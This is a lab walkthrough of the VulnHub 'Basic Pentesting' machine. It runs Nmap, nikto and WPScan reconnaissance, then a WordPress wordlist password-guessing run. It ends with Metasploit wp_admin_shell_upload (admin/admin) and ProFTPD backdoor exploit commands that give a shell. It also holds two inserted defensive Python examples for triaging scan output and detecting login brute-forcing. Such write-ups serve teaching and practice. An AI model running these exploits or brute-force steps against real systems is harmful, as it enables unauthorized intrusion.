VulnHub Basic Pentesting
Good day to all.
Many of you know about pentesting; some have even done it, and some have only heard of it and would like to feel like a mini specialist in this field. A long time ago, or maybe not so long ago, a lab dedicated to just that appeared on VulnHub.
ACT I - Setup
For this work I used Kali Linux and VirtualBox, plus the lab VM itself, of course.
Now we need to connect the two machines. The simplest way: open cmd, go to the directory where VirtualBox is installed and create a DHCP server for a named internal network with VBoxManage:
cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable
Now, in the network settings of both the Kali and the Basic Pentesting VM, select the internal network with the name we gave in cmd (internet).
ACT II - In the beginning
Check whether Kali Linux sees our lab.
We see the connection on eth0. Now we need to find out the specific IP of the lab machine. For this we will use the well-known Nmap program.
The lab's IP is 10.0.1.2.
ACT III - Basic Pentesting
After Nmap scanned our virtual network, we saw that 3 ports were open on the lab machine:
- 21 - ftp
- 22 - ssh
- 80 - http
Let's try connecting to port 80. To do this, open a browser (in my case, Firefox).
Fine! The site is up. Let's check which directories it hides from us. For this we will use the wonderful nikto program and look at the result.
OSVDB-3092: /secret/: This might be interesting
The secret directory should be interesting. Let's find out what it is hiding.
It looks like a 3 out of 10, of course, but that can all be fixed, in the name of beauty and convenience.
The most attentive readers have probably already guessed why: nikto and Nmap hinted at it more than once.
- nikto: Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>
- Nmap: Nmap scan report for vtcsec (10.0.1.2)
Let's add the name to /etc/hosts through the terminal:
# echo "10.0.1.2 vtcsec" >> /etc/hosts
Now we are ready to see the site in all its beauty.
Now, like a bloodhound, we go through all the directories of the site, poke at everything that can be poked, and in the end find out that the site runs on WordPress. Yes, yes, nikto told us that before, but we are not looking for easy ways.
Let's use the WordPress vulnerability scanner WPScan:
# wpscan --url http://10.0.1.2/secret/
WordPress Security Scanner by the WPScan Team
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
[+] URL: http://10.0.1.2/secret/
[+] Started: Thu Mar 8 17:47:02 2018
[!] The WordPress 'http://10.0.1.2/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: http://vtcsec/secret/index.php/wp-json/; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.0.1.2/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.0.1.2/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.1.2/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 — RSS and Atom Feed Escaping
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 — HTML Language Attribute Escaping
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 — 'newbloguser' Key Weak Hashing
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 — MediaElement Cross-Site Scripting (XSS)
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 — Application Denial of Service (DoS) (unpatched)
[+] WordPress theme in use: twentyseventeen — v1.4
[+] Name: twentyseventeen — v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/
| Readme: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/style.css
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a…
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection…
[+] No plugins found
[+] Finished: Thu Mar 8 17:47:06 2018
[+] Requests Done: 89
[+] Memory used: 37.828 MB
[+] Elapsed time: 00:00:03
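As a defender's follow-up to the scan above, here is an added Python example (mine, not part of the original post and not WPScan's own code) that turns the scanner's text into a remediation summary: the minimum WordPress version to upgrade to, the findings that have no fix, and the directories whose listing must be switched off. The sample output is constructed and abridged from the scan above, in the tool's normal "Title" then "Fixed in" line order.

```python
import re

# Constructed, abridged WPScan-style output modelled on the scan above (not a
# verbatim copy); it follows the tool's "Title" then "Fixed in" line order.
SAMPLE = """\
[!] The WordPress 'http://10.0.1.2/secret/readme.html' file exists exposing a version number
[!] Upload directory has directory listing enabled: http://10.0.1.2/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.1.2/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
"""

def version_tuple(v):
    """'4.9.1' -> (4, 9, 1) so versions compare numerically, not as strings."""
    return tuple(int(x) for x in v.split("."))

def triage(text):
    """Reduce WPScan output to what the site owner must act on."""
    report = {"version": None, "upgrade_to": None, "fixed": [],
              "unpatched": [], "listing_dirs": [], "exposes_readme": False}
    current = None  # title waiting for its "Fixed in" line
    for line in text.splitlines():
        m = re.match(r"\[\+\] WordPress version (\d+(?:\.\d+)*)", line)
        if m:
            report["version"] = m.group(1)
        elif line.startswith("[!] Title:"):
            current = line.split("Title:", 1)[1].strip()
            if "(unpatched)" in current:      # no fix at scan time: needs a mitigation instead
                report["unpatched"].append(current)
                current = None
        elif line.startswith("[i] Fixed in:") and current:
            fixed = line.split(":", 1)[1].strip()
            report["fixed"].append((current, fixed))
            # the upgrade target is the highest "Fixed in" version seen
            if report["upgrade_to"] is None or version_tuple(fixed) > version_tuple(report["upgrade_to"]):
                report["upgrade_to"] = fixed
            current = None
        elif "directory listing enabled:" in line:   # fix with Options -Indexes in Apache
            report["listing_dirs"].append(line.rsplit(": ", 1)[1])
        elif "readme.html" in line and "exposing a version" in line:
            report["exposes_readme"] = True
    return report

if __name__ == "__main__":
    print(triage(SAMPLE))
```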
Hmmm, let's try to list all the usernames with the --enumerate u flag.
# wpscan --url http://10.0.1.2/secret/ --enumerate u
There is only one user. So we can try to guess the password with a wordlist.
# wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2
Unfortunately, our brute-force attempt was not successful, but we saw something interesting: an error for the login admin with the password admin.
We'll have to try an exploit through Metasploit.
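The password-guessing run above is exactly the kind of traffic the lab's web server log would record. The following added Python example (mine, not the author's and not WPScan's) flags clients that repeatedly POST to a WordPress login endpoint within a short window, which is how a site owner would spot such a run. The Apache log lines, the scanner address 10.0.1.5 and the user-agent strings are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines (not taken from the page): a scanner at
# 10.0.1.5 hammering the lab's login page, plus one ordinary visitor at 10.0.1.7.
SAMPLE_LOG = [
    f'10.0.1.5 - - [08/Mar/2018:17:50:{s:02d} +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3211 "-" "WPScan"'
    for s in range(0, 40, 5)
] + [
    '10.0.1.7 - - [08/Mar/2018:17:50:10 +0000] "GET /secret/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '10.0.1.7 - - [08/Mar/2018:17:51:30 +0000] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# wp-login.php takes form logins; xmlrpc.php also accepts credentials (system.multicall)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def parse(line):
    """Return (ip, timestamp, method, path, status) or None for a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0], int(m.group("status"))

def detect_login_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: total_login_posts} for clients that POST to a login endpoint
    at least `threshold` times within any `window_seconds` span."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3].endswith(LOGIN_PATHS):
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged

if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))
```

The same rule works as a fail2ban-style filter: block or rate-limit the flagged address and alert on any successful (302) login that follows a flagged burst.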
ACT IV - Admin is coming
First you need to set up Metasploit.
# /etc/init.d/postgresql start
# msfdb init
Let's get started!
We need to find our exploit. We use the search command:
# search admin
From the list, wp_admin_shell_upload suits us.
We launch it and carry out the setup:
# msf> use exploit/unix/webapp/wp_admin_shell_upload
# msf> set username admin
# msf> set password admin
# msf> set rhost 10.0.1.2
# msf> set targeturi /secret
It should look like this:
Go to the browser and log in as admin / admin.
ACT V - I see backdoor
Now let's try to get a terminal. For this, we again need Metasploit.
# msf>use exploit/unix/ftp/proftpd_133c_backdoor
We carry out the setup:
# msf>set rhost 10.0.1.2
Launch! (you can use exploit instead of run)
Tadaaam, we got access to the console.